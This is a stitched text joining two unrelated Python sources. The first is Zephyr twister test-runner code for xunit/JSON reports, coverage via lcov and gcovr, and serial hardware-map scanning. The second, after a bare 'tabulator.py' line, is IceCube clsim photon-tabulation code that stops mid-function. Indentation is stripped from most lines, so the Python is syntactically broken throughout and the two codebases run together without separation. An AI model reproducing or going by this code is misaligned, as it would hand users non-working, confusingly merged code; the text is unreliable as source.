# do not create entry if everything is filtered out
if not self.detailed_skipped_report:
suites_to_report = list(filter(lambda d: d.get('status') != "filtered", all_suites))
for suite in suites_to_report:
duration = 0
eleTestsuite = ET.SubElement(eleTestsuites, 'testsuite',
name=suite.get("name"), time="0",
timestamp = self.timestamp,
tests="0",
failures="0",
errors="0", skipped="0")
eleTSPropetries = ET.SubElement(eleTestsuite, 'properties')
# Multiple 'property' can be added to 'properties'
# differing by name and value
ET.SubElement(eleTSPropetries, 'property', name="version", value=version)
ET.SubElement(eleTSPropetries, 'property', name="platform", value=suite.get("platform"))
ET.SubElement(eleTSPropetries, 'property', name="architecture", value=suite.get("arch"))
total = 0
fails = passes = errors = skips = 0
handler_time = suite.get('execution_time', 0)
runnable = suite.get('runnable', 0)
duration += float(handler_time)
ts_status = suite.get('status')
for tc in suite.get("testcases", []):
status = tc.get('status')
reason = tc.get('reason', suite.get('reason', 'Unknown'))
log = tc.get("log", suite.get("log"))
tc_duration = tc.get('execution_time', handler_time)
name = tc.get("identifier")
classname = ".".join(name.split(".")[:2])
fails, passes, errors, skips = self.xunit_testcase(eleTestsuite,
name, classname, status, ts_status, reason, tc_duration, runnable,
(fails, passes, errors, skips), log, True)
total = (errors + passes + fails + skips)
eleTestsuite.attrib['time'] = f"{duration}"
eleTestsuite.attrib['failures'] = f"{fails}"
eleTestsuite.attrib['errors'] = f"{errors}"
eleTestsuite.attrib['skipped'] = f"{skips}"
eleTestsuite.attrib['tests'] = f"{total}"
result = ET.tostring(eleTestsuites)
with open(filename, 'wb') as report:
report.write(result)
def xunit_report(self, json_file, filename, selected_platform=None, full_report=False):
if selected_platform:
selected = [selected_platform]
logger.info(f"Writing target report for {selected_platform}...")
else:
logger.info(f"Writing xunit report {filename}...")
selected = self.selected_platforms
json_data = {}
with open(json_file, "r") as json_results:
json_data = json.load(json_results)
env = json_data.get('environment', {})
version = env.get('zephyr_version', None)
eleTestsuites = ET.Element('testsuites')
all_suites = json_data.get("testsuites", [])
for platform in selected:
suites = list(filter(lambda d: d['platform'] == platform, all_suites))
# do not create entry if everything is filtered out
if not self.detailed_skipped_report:
non_filtered = list(filter(lambda d: d.get('status') != "filtered", suites))
if not non_filtered:
continue
duration = 0
eleTestsuite = ET.SubElement(eleTestsuites, 'testsuite',
name=platform,
timestamp = self.timestamp,
time="0",
tests="0",
failures="0",
errors="0", skipped="0")
eleTSPropetries = ET.SubElement(eleTestsuite, 'properties')
# Multiple 'property' can be added to 'properties'
# differing by name and value
ET.SubElement(eleTSPropetries, 'property', name="version", value=version)
total = 0
fails = passes = errors = skips = 0
for ts in suites:
handler_time = ts.get('execution_time', 0)
runnable = ts.get('runnable', 0)
duration += float(handler_time)
ts_status = ts.get('status')
# Do not report filtered testcases
if ts_status == 'filtered' and not self.detailed_skipped_report:
continue
if full_report:
for tc in ts.get("testcases", []):
status = tc.get('status')
reason = tc.get('reason', ts.get('reason', 'Unknown'))
log = tc.get("log", ts.get("log"))
tc_duration = tc.get('execution_time', handler_time)
name = tc.get("identifier")
classname = ".".join(name.split(".")[:2])
fails, passes, errors, skips = self.xunit_testcase(eleTestsuite,
name, classname, status, ts_status, reason, tc_duration, runnable,
(fails, passes, errors, skips), log, True)
else:
reason = ts.get('reason', 'Unknown')
name = ts.get("name")
classname = f"{platform}:{name}"
log = ts.get("log")
fails, passes, errors, skips = self.xunit_testcase(eleTestsuite,
name, classname, ts_status, ts_status, reason, duration, runnable,
(fails, passes, errors, skips), log, False)
total = (errors + passes + fails + skips)
eleTestsuite.attrib['time'] = f"{duration}"
eleTestsuite.attrib['failures'] = f"{fails}"
eleTestsuite.attrib['errors'] = f"{errors}"
eleTestsuite.attrib['skipped'] = f"{skips}"
eleTestsuite.attrib['tests'] = f"{total}"
result = ET.tostring(eleTestsuites)
with open(filename, 'wb') as report:
report.write(result)
def json_report(self, filename, version="NA"):
logger.info(f"Writing JSON report {filename}")
report = {}
report["environment"] = {"os": os.name,
"zephyr_version": version,
"toolchain": self.get_toolchain()
}
suites = []
for instance in self.instances.values():
suite = {}
handler_log = os.path.join(instance.build_dir, "handler.log")
build_log = os.path.join(instance.build_dir, "build.log")
device_log = os.path.join(instance.build_dir, "device.log")
handler_time = instance.metrics.get('handler_time', 0)
ram_size = instance.metrics.get ("ram_size", 0)
rom_size = instance.metrics.get("rom_size",0)
suite = {
"name": instance.testsuite.name,
"arch": instance.platform.arch,
"platform": instance.platform.name,
}
if instance.run_id:
suite['run_id'] = instance.run_id
suite["runnable"] = False
if instance.status != 'filtered':
suite["runnable"] = instance.run
if ram_size:
suite["ram_size"] = ram_size
if rom_size:
suite["rom_size"] = rom_size
if instance.status in ["error", "failed"]:
suite['status'] = instance.status
suite["reason"] = instance.reason
# FIXME
if os.path.exists(handler_log):
suite["log"] = self.process_log(handler_log)
elif os.path.exists(device_log):
suite["log"] = self.process_log(device_log)
else:
suite["log"] = self.process_log(build_log)
elif instance.status == 'filtered':
suite["status"] = "filtered"
suite["reason"] = instance.reason
elif instance.status == 'passed':
suite["status"] = "passed"
elif instance.status == 'skipped':
suite["status"] = "skipped"
suite["reason"] = instance.reason
if instance.status is not None:
suite["execution_time"] = f"{float(handler_time):.2f}"
testcases = []
if len(instance.testcases) == 1:
single_case_duration = f"{float(handler_time):.2f}"
else:
single_case_duration = 0
for case in instance.testcases:
testcase = {}
testcase['identifier'] = case.name
if instance.status:
if single_case_duration:
testcase['execution_time'] = single_case_duration
else:
testcase['execution_time'] = f"{float(case.duration):.2f}"
if case.output != "":
testcase['log'] = case.output
if case.status == "skipped":
if instance.status == "filtered":
testcase["status"] = "filtered"
else:
testcase["status"] = "skipped"
testcase["reason"] = case.reason or instance.reason
else:
testcase["status"] = case.status
if case.reason:
testcase["reason"] = case.reason
testcases.append(testcase)
suite['testcases'] = testcases
suites.append(suite)
report["testsuites"] = suites
with open(filename, "wt") as json_file:
json.dump(report, json_file, indent=4, separators=(',',':'))
def get_testsuite(self, identifier):
results = []
for _, ts in self.testsuites.items():
for case in ts.testcases:
if case == identifier:
results.append(ts)
return results
def verify_platforms_existence(self, platform_names_to_verify, log_info=""):
"""
        Verify that each platform name (passed by the --platform option, or in
        a yaml file via the platform_allow or integration_platforms options) is
        correct. If not, log an error and exit.
        """
        for platform in platform_names_to_verify:
            if platform not in self.platform_names:
                logger.error(f"{log_info} - unrecognized platform - {platform}")
                sys.exit(2)
def create_build_dir_links(self):
"""
        Iterate through all non-skipped instances in the suite and create a link
        for each instance's build directory. Those links will be passed to the
        CMake command in the next steps.
"""
links_dir_name = "twister_links" # folder for all links
links_dir_path = os.path.join(self.outdir, links_dir_name)
if not os.path.exists(links_dir_path):
os.mkdir(links_dir_path)
for instance in self.instances.values():
if instance.status != "skipped":
self._create_build_dir_link(links_dir_path, instance)
def _create_build_dir_link(self, links_dir_path, instance):
"""
        Create the build directory with its original "long" path, then create a
        link with a shorter path pointing at that directory and replace
        build_dir with the created link. The link is what gets passed to the
        CMake command. This helps to limit the path length, which can be
        significant when building with CMake on Windows.
"""
os.makedirs(instance.build_dir, exist_ok=True)
link_name = f"test_{self.link_dir_counter}"
link_path = os.path.join(links_dir_path, link_name)
if os.name == "nt": # if OS is Windows
command = ["mklink", "/J", f"{link_path}", f"{instance.build_dir}"]
subprocess.call(command, shell=True)
else: # for Linux and MAC OS
os.symlink(instance.build_dir, link_path)
# Here original build directory is replaced with symbolic link. It will
# be passed to CMake command
instance.build_dir = link_path
self.link_dir_counter += 1
class CoverageTool:
""" Base class for every supported coverage tool
"""
def __init__(self):
self.gcov_tool = None
self.base_dir = None
@staticmethod
def factory(tool):
if tool == 'lcov':
t = Lcov()
elif tool == 'gcovr':
t = Gcovr()
else:
logger.error("Unsupported coverage tool specified: {}".format(tool))
return None
logger.debug(f"Select {tool} as the coverage tool...")
return t
@staticmethod
def retrieve_gcov_data(input_file):
logger.debug("Working on %s" % input_file)
extracted_coverage_info = {}
capture_data = False
capture_complete = False
with open(input_file, 'r') as fp:
for line in fp.readlines():
if re.search("GCOV_COVERAGE_DUMP_START", line):
capture_data = True
continue
if re.search("GCOV_COVERAGE_DUMP_END", line):
capture_complete = True
break
# Loop until the coverage data is found.
if not capture_data:
continue
if line.startswith("*"):
sp = line.split("<")
if len(sp) > 1:
# Remove the leading delimiter "*"
file_name = sp[0][1:]
# Remove the trailing new line char
hex_dump = sp[1][:-1]
else:
continue
else:
continue
extracted_coverage_info.update({file_name: hex_dump})
if not capture_data:
capture_complete = True
return {'complete': capture_complete, 'data': extracted_coverage_info}
@staticmethod
def create_gcda_files(extracted_coverage_info):
logger.debug("Generating gcda files")
for filename, hexdump_val in extracted_coverage_info.items():
            # If kobject_hash is given for coverage, gcovr fails, hence skip it.
            # The problem only exists in gcovr v4.1.
if "kobject_hash" in filename:
filename = (filename[:-4]) + "gcno"
try:
os.remove(filename)
except Exception:
pass
continue
with open(filename, 'wb') as fp:
fp.write(bytes.fromhex(hexdump_val))
def generate(self, outdir):
for filename in glob.glob("%s/**/handler.log" % outdir, recursive=True):
gcov_data = self.__class__.retrieve_gcov_data(filename)
capture_complete = gcov_data['complete']
extracted_coverage_info = gcov_data['data']
if capture_complete:
self.__class__.create_gcda_files(extracted_coverage_info)
logger.debug("Gcov data captured: {}".format(filename))
else:
logger.error("Gcov data capture incomplete: {}".format(filename))
with open(os.path.join(outdir, "coverage.log"), "a") as coveragelog:
ret = self._generate(outdir, coveragelog)
if ret == 0:
logger.info("HTML report generated: {}".format(
os.path.join(outdir, "coverage", "index.html")))
class Lcov(CoverageTool):
def __init__(self):
super().__init__()
self.ignores = []
def add_ignore_file(self, pattern):
self.ignores.append('*' + pattern + '*')
def add_ignore_directory(self, pattern):
self.ignores.append('*/' + pattern + '/*')
def _generate(self, outdir, coveragelog):
coveragefile = os.path.join(outdir, "coverage.info")
ztestfile = os.path.join(outdir, "ztest.info")
cmd = ["lcov", "--gcov-tool", self.gcov_tool,
"--capture", "--directory", outdir,
"--rc", "lcov_branch_coverage=1",
"--output-file", coveragefile]
cmd_str = " ".join(cmd)
logger.debug(f"Running {cmd_str}...")
subprocess.call(cmd, stdout=coveragelog)
# We want to remove tests/* and tests/ztest/test/* but save tests/ztest
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool, "--extract",
coveragefile,
os.path.join(self.base_dir, "tests", "ztest", "*"),
"--output-file", ztestfile,
"--rc", "lcov_branch_coverage=1"], stdout=coveragelog)
if os.path.exists(ztestfile) and os.path.getsize(ztestfile) > 0:
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool, "--remove",
ztestfile,
os.path.join(self.base_dir, "tests/ztest/test/*"),
"--output-file", ztestfile,
"--rc", "lcov_branch_coverage=1"],
stdout=coveragelog)
files = [coveragefile, ztestfile]
else:
files = [coveragefile]
for i in self.ignores:
subprocess.call(
["lcov", "--gcov-tool", self.gcov_tool, "--remove",
coveragefile, i, "--output-file",
coveragefile, "--rc", "lcov_branch_coverage=1"],
stdout=coveragelog)
# The --ignore-errors source option is added to avoid it exiting due to
# samples/application_development/external_lib/
return subprocess.call(["genhtml", "--legend", "--branch-coverage",
"--ignore-errors", "source",
"-output-directory",
os.path.join(outdir, "coverage")] + files,
stdout=coveragelog)
class Gcovr(CoverageTool):
def __init__(self):
super().__init__()
self.ignores = []
def add_ignore_file(self, pattern):
self.ignores.append('.*' + pattern + '.*')
def add_ignore_directory(self, pattern):
self.ignores.append(".*/" + pattern + '/.*')
@staticmethod
def _interleave_list(prefix, list):
tuple_list = [(prefix, item) for item in list]
return [item for sublist in tuple_list for item in sublist]
def _generate(self, outdir, coveragelog):
coveragefile = os.path.join(outdir, "coverage.json")
ztestfile = os.path.join(outdir, "ztest.json")
excludes = Gcovr._interleave_list("-e", self.ignores)
# We want to remove tests/* and tests/ztest/test/* but save tests/ztest
cmd = ["gcovr", "-r", self.base_dir, "--gcov-executable",
self.gcov_tool, "-e", "tests/*"] + excludes + ["--json", "-o",
coveragefile, outdir]
cmd_str = " ".join(cmd)
logger.debug(f"Running {cmd_str}...")
subprocess.call(cmd, stdout=coveragelog)
subprocess.call(["gcovr", "-r", self.base_dir, "--gcov-executable",
self.gcov_tool, "-f", "tests/ztest", "-e",
"tests/ztest/test/*", "--json", "-o", ztestfile,
outdir], stdout=coveragelog)
if os.path.exists(ztestfile) and os.path.getsize(ztestfile) > 0:
files = [coveragefile, ztestfile]
else:
files = [coveragefile]
subdir = os.path.join(outdir, "coverage")
os.makedirs(subdir, exist_ok=True)
tracefiles = self._interleave_list("--add-tracefile", files)
return subprocess.call(["gcovr", "-r", self.base_dir, "--html",
"--html-details"] + tracefiles +
["-o", os.path.join(subdir, "index.html")],
stdout=coveragelog)
class DUT(object):
def __init__(self,
id=None,
serial=None,
serial_baud=None,
platform=None,
product=None,
serial_pty=None,
connected=False,
runner_params=None,
pre_script=None,
post_script=None,
post_flash_script=None,
runner=None):
self.serial = serial
self.baud = serial_baud or 115200
self.platform = platform
self.serial_pty = serial_pty
self._counter = Value("i", 0)
self._available = Value("i", 1)
self.connected = connected
self.pre_script = pre_script
self.id = id
self.product = product
self.runner = runner
self.runner_params = runner_params
self.fixtures = []
self.post_flash_script = post_flash_script
self.post_script = post_script
self.pre_script = pre_script
self.probe_id = None
self.notes = None
self.lock = Lock()
self.match = False
@property
def available(self):
with self._available.get_lock():
return self._available.value
@available.setter
def available(self, value):
with self._available.get_lock():
self._available.value = value
@property
def counter(self):
with self._counter.get_lock():
return self._counter.value
@counter.setter
def counter(self, value):
with self._counter.get_lock():
self._counter.value = value
def to_dict(self):
d = {}
exclude = ['_available', '_counter', 'match']
v = vars(self)
for k in v.keys():
if k not in exclude and v[k]:
d[k] = v[k]
return d
def __repr__(self):
return f"<{self.platform} ({self.product}) on {self.serial}>"
class HardwareMap:
schema_path = os.path.join(ZEPHYR_BASE, "scripts", "schemas", "twister", "hwmap-schema.yaml")
manufacturer = [
'ARM',
'SEGGER',
'MBED',
'STMicroelectronics',
'Atmel Corp.',
'Texas Instruments',
'Silicon Labs',
'NXP Semiconductors',
'Microchip Technology Inc.',
'FTDI',
'Digilent'
]
runner_mapping = {
'pyocd': [
'DAPLink CMSIS-DAP',
'MBED CMSIS-DAP'
],
'jlink': [
'J-Link',
'J-Link OB'
],
'openocd': [
'STM32 STLink', '^XDS110.*', 'STLINK-V3'
],
'dediprog': [
'TTL232R-3V3',
'MCP2200 USB Serial Port Emulator'
]
}
def __init__(self):
self.detected = []
self.duts = []
def add_device(self, serial, platform, pre_script, is_pty, baud=None):
device = DUT(platform=platform, connected=True, pre_script=pre_script, serial_baud=baud)
if is_pty:
device.serial_pty = serial
else:
device.serial = serial
self.duts.append(device)
def load(self, map_file):
hwm_schema = scl.yaml_load(self.schema_path)
duts = scl.yaml_load_verify(map_file, hwm_schema)
for dut in duts:
pre_script = dut.get('pre_script')
post_script = dut.get('post_script')
post_flash_script = dut.get('post_flash_script')
platform = dut.get('platform')
id = dut.get('id')
runner = dut.get('runner')
runner_params = dut.get('runner_params')
serial_pty = dut.get('serial_pty')
serial = dut.get('serial')
baud = dut.get('baud', None)
product = dut.get('product')
fixtures = dut.get('fixtures', [])
connected= dut.get('connected') and ((serial or serial_pty) is not None)
new_dut = DUT(platform=platform,
product=product,
runner=runner,
runner_params=runner_params,
id=id,
serial_pty=serial_pty,
serial=serial,
serial_baud=baud,
connected=connected,
pre_script=pre_script,
post_script=post_script,
post_flash_script=post_flash_script)
new_dut.fixtures = fixtures
new_dut.counter = 0
self.duts.append(new_dut)
def scan(self, persistent=False):
from serial.tools import list_ports
if persistent and platform.system() == 'Linux':
# On Linux, /dev/serial/by-id provides symlinks to
# '/dev/ttyACMx' nodes using names which are unique as
# long as manufacturers fill out USB metadata nicely.
#
# This creates a map from '/dev/ttyACMx' device nodes
# to '/dev/serial/by-id/usb-...' symlinks. The symlinks
# go into the hardware map because they stay the same
# even when the user unplugs / replugs the device.
#
# Some inexpensive USB/serial adapters don't result
# in unique names here, though, so use of this feature
# requires explicitly setting persistent=True.
by_id = Path('/dev/serial/by-id')
def readlink(link):
return str((by_id / link).resolve())
persistent_map = {readlink(link): str(link)
for link in by_id.iterdir()}
else:
persistent_map = {}
serial_devices = list_ports.comports()
logger.info("Scanning connected hardware...")
for d in serial_devices:
if d.manufacturer in self.manufacturer:
# TI XDS110 can have multiple serial devices for a single board
# assume endpoint 0 is the serial, skip all others
if d.manufacturer == 'Texas Instruments' and not d.location.endswith('0'):
continue
s_dev = DUT(platform="unknown",
id=d.serial_number,
serial=persistent_map.get(d.device, d.device),
product=d.product,
runner='unknown',
connected=True)
                for runner, products in self.runner_mapping.items():
if d.product in products:
s_dev.runner = runner
continue
# Try regex matching
for p in products:
if re.match(p, d.product):
s_dev.runner = runner
s_dev.connected = True
s_dev.lock = None
self.detected.append(s_dev)
else:
logger.warning("Unsupported device (%s): %s" % (d.manufacturer, d))
def save(self, hwm_file):
# use existing map
self.detected.sort(key=lambda x: x.serial or '')
if os.path.exists(hwm_file):
with open(hwm_file, 'r') as yaml_file:
hwm = yaml.load(yaml_file, Loader=SafeLoader)
if hwm:
hwm.sort(key=lambda x: x.get('serial', ''))
# disconnect everything
for h in hwm:
h['connected'] = False
h['serial'] = None
for _detected in self.detected:
for h in hwm:
if _detected.id == h['id'] and _detected.product == h['product'] and not _detected.match:
h['connected'] = True
h['serial'] = _detected.serial
_detected.match = True
new_duts = list(filter(lambda d: not d.match, self.detected))
new = []
for d in new_duts:
new.append(d.to_dict())
if hwm:
hwm = hwm + new
else:
hwm = new
with open(hwm_file, 'w') as yaml_file:
yaml.dump(hwm, yaml_file, Dumper=Dumper, default_flow_style=False)
self.load(hwm_file)
logger.info("Registered devices:")
self.dump()
else:
# create new file
dl = []
for _connected in self.detected:
platform = _connected.platform
id = _connected.id
runner = _connected.runner
serial = _connected.serial
product = _connected.product
d = {
'platform': platform,
'id': id,
'runner': runner,
'serial': serial,
'product': product,
'connected': _connected.connected
}
dl.append(d)
with open(hwm_file, 'w') as yaml_file:
yaml.dump(dl, yaml_file, Dumper=Dumper, default_flow_style=False)
logger.info("Detected devices:")
self.dump(detected=True)
def dump(self, filtered=[], header=[], connected_only=False, detected=False):
print("")
table = []
if detected:
to_show = self.detected
else:
to_show = self.duts
if not header:
header = ["Platform", "ID", "Serial device"]
for p in to_show:
platform = p.platform
connected = p.connected
if filtered and platform not in filtered:
continue
if not connected_only or connected:
table.append([platform, p.id, p.serial])
print(tabulate(table, headers=header, tablefmt="github"))
tabulator.py
# Copyright (c) 2012
# Jakob van Santen <jvansanten@icecube.wisc.edu>
# Claudio Kopper <claudio.kopper@icecube.wisc.edu>
# and the IceCube Collaboration <http://www.icecube.wisc.edu>
#
# Permission to use, copy, modify, and/or distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY
# SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION
# OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN
# CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
#
#
# $Id: tabulator.py 140305 2015-12-10 10:54:09Z jvansanten $
#
# @file tabulator.py
# @version $Revision: 140305 $
# @date $Date: 2015-12-10 05:54:09 -0500 (Thu, 10 Dec 2015) $
# @author Jakob van Santen
from __future__ import print_function
from icecube.icetray import I3Units, I3Module, traysegment
from icecube.dataclasses import I3Position, I3Particle, I3MCTree, I3Direction, I3Constants
from icecube.phys_services import I3Calculator, I3GSLRandomService
from icecube.clsim import I3CLSimFunctionConstant
from icecube.clsim import GetIceCubeDOMAcceptance, GetIceCubeDOMAngularSensitivity
from icecube.clsim import Gen2Sensors
from icecube.clsim import FlasherInfoVectToFlasherPulseSeriesConverter, I3CLSimFlasherPulse, I3CLSimFlasherPulseSeries
import numpy, math
from icecube.photospline import numpy_extensions # meshgrid_nd
from icecube.photospline.photonics import FITSTable, Efficiency, Geometry, Parity
def generate_seed():
import struct
    # open in binary mode so struct.unpack() receives bytes (required on Python 3)
    with open('/dev/random', 'rb') as rand:
        return struct.unpack('I', rand.read(4))[0]
def makeFlasherPulse(x, y, z, zenith, azimuth, width, brightness, scale):
pulse = I3CLSimFlasherPulse()
pulse.type = I3CLSimFlasherPulse.FlasherPulseType.LED405nm
pulse.pos = I3Position(x, y, z)
pulse.dir = I3Direction(zenith, azimuth)
pulse.time = 0.
pulse.pulseWidth = (float(width)/2.)*I3Units.ns
lightscale = 1./(32582*5.21) # scale down to match 1 GeV equivalent electromagnetic cascade energy
pulse.numberOfPhotonsNoBias = 1.17e10*lightscale*scale*(0.0006753+0.00005593*float(brightness))*(float(width)+13.9-(57.5/(1.+float(brightness)/34.4)))
if numpy.abs(zenith - 90.*I3Units.degree) > 22.5*I3Units.degree:
tiltedFlasher = True # this is only a rough approximation to describe a tilted flasher
else:
tiltedFlasher = False
pulse.angularEmissionSigmaPolar = FlasherInfoVectToFlasherPulseSeriesConverter.LEDangularEmissionProfile[(pulse.type, tiltedFlasher)][0]
pulse.angularEmissionSigmaAzimuthal = FlasherInfoVectToFlasherPulseSeriesConverter.LEDangularEmissionProfile[(pulse.type, tiltedFlasher)][1]
return pulse
def unpin_threads(delay=60):
"""
    When AMD OpenCL fissions the CPU device, it pins each sub-device to a
    physical core. Since we always use sub-device 0, this means that multiple
instances of the tabulator on a single machine will compete for core 0.
Reset thread affinity after *delay* seconds to prevent this from happening.
"""
import os
import subprocess
import threading
import time
def which(program):
def is_exe(fpath):
return os.path.exists(fpath) and os.access(fpath, os.X_OK)
def ext_candidates(fpath):
yield fpath
for ext in os.environ.get("PATHEXT", "").split(os.pathsep):
yield fpath + ext
fpath, fname = os.path.split(program)
if fpath:
if is_exe(program):
return program
else:
for path in os.environ["PATH"].split(os.pathsep):
exe_file = os.path.join(path, program)
for candidate in ext_candidates(exe_file):
if is_exe(candidate):
return candidate
return None
def taskset(pid,tt=None):
# get/set the taskset affinity for pid
# uses a binary number string for the core affinity
l = [which('taskset'),'-p']
if tt:
l.append(hex(int(tt,2))[2:])
l.append(str(pid))
p = subprocess.Popen(l,stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = p.communicate()[0].split(':')[-1].strip()
if not tt:
return bin(int(output,16))[2:]
def resetTasksetThreads(main_pid):
# reset thread taskset affinity
time.sleep(delay)
        # count logical CPUs by counting 'processor' entries in /proc/cpuinfo
        # (avoids reduce(), which would need a functools import on Python 3)
        num_cpus = sum('processor' in line for line in open('/proc/cpuinfo').readlines())
tt = '1'*num_cpus
#tt = taskset(main_pid)
p = subprocess.Popen([which('ps'),'-Lo','tid','--no-headers','%d'%main_pid],stdout=subprocess.PIPE,stderr=subprocess.PIPE)
for tid in p.communicate()[0].split():
tid = tid.strip()
if tid:
taskset(tid,tt)
# only do this on linux
try:
open('/proc/cpuinfo')
except IOError:
return
# and only if taskset exists
if not which('taskset'):
return
threading.Thread(target=resetTasksetThreads,args=(os.getpid(),)).start()
from icecube.clsim import GetDefaultParameterizationList
from icecube.clsim import GetFlasherParameterizationList
from icecube.clsim import GetHybridParameterizationList
from icecube.clsim import AutoSetGeant4Environment
from icecube.clsim.traysegments.common import configureOpenCLDevices, parseIceModel
from icecube import icetray
from os.path import expandvars
@icetray.traysegment
def I3CLSimTabulatePhotons(tray, name,
UseCPUs=True,
UseGPUs=False,
UseOnlyDeviceNumber=None,
MCTreeName="I3MCTree",
OutputMCTreeName=None,
FlasherInfoVectName=None,
FlasherPulseSeriesName=None,
MMCTrackListName="MMCTrackList",
ParallelEvents=1000,
RandomService=None,
MediumProperties=expandvars("$I3_BUILD/ice-models/resources/models/spice_mie"),
UseGeant4=False,
CrossoverEnergyEM=None,
CrossoverEnergyHadron=None,
UseCascadeExtension=False,
DoNotParallelize=False,
Area=None,
WavelengthAcceptance=None,
AngularAcceptance=None,
UseHoleIceParameterization=True,
OverrideApproximateNumberOfWorkItems=None,
ExtraArgumentsToI3CLSimModule=dict(),
If=lambda f: True
):
"""Do standard clsim processing up to the I3Photon level.
These photons still need to be converted to I3MCPEs to be usable
for further steps in the standard IceCube MC processing chain.
Reads its particles from an I3MCTree and writes an I3PhotonSeriesMap.
All available OpenCL GPUs (and optionally CPUs) will
be used. This will take over your entire machine,
so make sure to configure your batch jobs correctly
when using this on a cluster.
When using nVidia cards, you can set the
CUDA_VISIBLE_DEVICES environment variable to
limit GPU visibility. A setting of
CUDA_VISIBLE_DEVICES="0,3" would only use cards
#0 and #3 and ignore cards #1 and #2. In case you are
using a batch system, chances are this variable is already
set. Unfortunately, there is no corresponding setting
for the AMD driver.
This segment assumes that MMC has been applied to the
I3MCTree and that MMC was *NOT* run using the "-recc" option.
:param UseCPUs:
Turn this on to also use CPU-based devices.
(This may potentially slow down photon generation, which
is also done on the CPU in parallel.)
:param UseGPUs:
Turn this off to not use GPU-based devices.
This may be useful if your GPU is used for display
purposes and you don't want it to slow down.
:param UseOnlyDeviceNumber:
Use only a single device number, even if there is more than
one device found matching the required description. The numbering
starts at 0.
:param MCTreeName:
The name of the I3MCTree containing the particles to propagate.
:param OutputMCTreeName:
A copy of the (possibly sliced) MCTree will be stored as this name.
:param FlasherInfoVectName:
Set this to the name of I3FlasherInfoVect objects in the frame to
enable flasher simulation. The module will read I3FlasherInfoVect objects
and generate photons according to assumed parameterizations.
:param FlasherPulseSeriesName:
Set this to the name of an I3CLSimFlasherPulseSeries object in the frame to
enable flasher/Standard Candle simulation.
This cannot be used at the same time as FlasherInfoVectName.
(I3CLSimFlasherPulseSeries objects are clsim's internal flasher
representation, if "FlasherInfoVectName" is used, the I3FlasherInfoVect
objects are converted to I3CLSimFlasherPulseSeries objects.)
:param MMCTrackListName:
Only used if *ChopMuons* is active. Set it to the name
of the I3MMCTrackList object that contains additional
muon energy loss information.
:param ParallelEvents:
clsim will work on a couple of events in parallel in order
not to starve the GPU. Setting this too high will result
in excessive memory usage (all your frames have to be cached
in RAM). Setting it too low may impact simulation performance.
The optimal value depends on your energy distribution/particle type.
:param RandomService:
Set this to an instance of a I3RandomService. Alternatively,
you can specify the name of a configured I3RandomServiceFactory
added to I3Tray using tray.AddService(). If you don't configure
this, the default I3RandomServiceFactory will be used.
:param MediumProperties:
Set this either to a directory containing a PPC-compatible
ice description (icemodel.dat, icemodel.par and cfg.txt) or
to a photonics ice table file. PPC-compatible ice files should
generally lead to faster execution times on GPUs since it involves
less interpolation between table entries (the PPC ice-specification
is parametric w.r.t. wavelength, whereas the photonics specification
is not).
:param Area:
Geometric area of the sensor. If None, use the area of an IceCube DOM
:param WavelengthAcceptance:
Quantum efficiency of the sensor, relative to the geometric area. If
None, use the IceCube DOM (standard QE)
:param AngularAcceptance:
Efficiency as a function of polar angle, relative to the geometric area.
If None, use the IceCube angular efficiency, assuming hole ice.
:param UseGeant4:
Enabling this setting will disable all cascade and muon light yield
        parameterizations. All particles will be sent to Geant4 for a full
simulation. This does **not** apply to muons that do have a length
assigned. These are assumed to have been generated by MMC and
their light is generated according to the usual parameterization.
:param CrossoverEnergyEM:
        If set, it defines the crossover energy between full Geant4 simulations and
        light yield parameterizations for electromagnetic cascades. This only works
        when UseGeant4 is set to true. It works in conjunction with CrossoverEnergyHadron.
        If either of the two is set to a positive value greater than 0 (GeV), the
        hybrid simulation is used.
If CrossoverEnergyEM is set to None while CrossoverEnergyHadron is set so
hybrid mode is working, GEANT4 is used for EM cascades.
If CrossoverEnergyEM is set to 0 (GeV) while CrossoverEnergyHadron is set
so hybrid mode is working, leptons and EM cascades will use parameterizations
for the whole energy range.
:param CrossoverEnergyHadron:
        If set, it defines the crossover energy between full Geant4 simulations and
        light yield parameterizations for hadronic cascades. This only works when
        UseGeant4 is set to true. It works in conjunction with CrossoverEnergyEM.
        If either of the two is set to a positive value greater than 0 (GeV), the
        hybrid simulation is used.
        If CrossoverEnergyHadron is set to None while CrossoverEnergyEM is set so
        hybrid mode is working, GEANT4 is used for hadronic cascades.
        If CrossoverEnergyHadron is set to 0 (GeV) while CrossoverEnergyEM is
        set so hybrid mode is working, hadronic cascades will use parameterizations
        for the whole energy range.
:param UseCascadeExtension:
If True, simulate the longitudinal development of cascades. Otherwise,
simulate cascades as pointlike objects.
:param DoNotParallelize:
Try only using a single work item in parallel when running the
OpenCL simulation. This might be useful if you want to run jobs
in parallel on a batch system. This will only affect CPUs and
will be a no-op for GPUs.
:param OverrideApproximateNumberOfWorkItems:
Allows to override the auto-detection for the maximum number of parallel work items.
You should only change this if you know what you are doing.
:param If:
Python function to use as conditional execution test for segment modules.
"""
from icecube import icetray, dataclasses, phys_services, clsim
# make sure the geometry is updated to the new granular format (in case it is supported)
if hasattr(dataclasses, "I3ModuleGeo"):
tray.AddModule("I3GeometryDecomposer", name + "_decomposeGeometry",
If=lambda frame: If(frame) and ("I3OMGeoMap" not in frame))
if UseGeant4:
if not clsim.I3CLSimLightSourceToStepConverterGeant4.can_use_geant4:
raise RuntimeError("You have requested to use Geant 4, but clsim was compiled without Geant 4 support")
# at the moment the Geant4 paths need to be set, even if it isn't used
# TODO: fix this
if clsim.I3CLSimLightSourceToStepConverterGeant4.can_use_geant4:
AutoSetGeant4Environment()
if MMCTrackListName is None or MMCTrackListName=="":
# the input does not seem to have been processed by MMC
ChopMuons = False
else:
ChopMuons = True
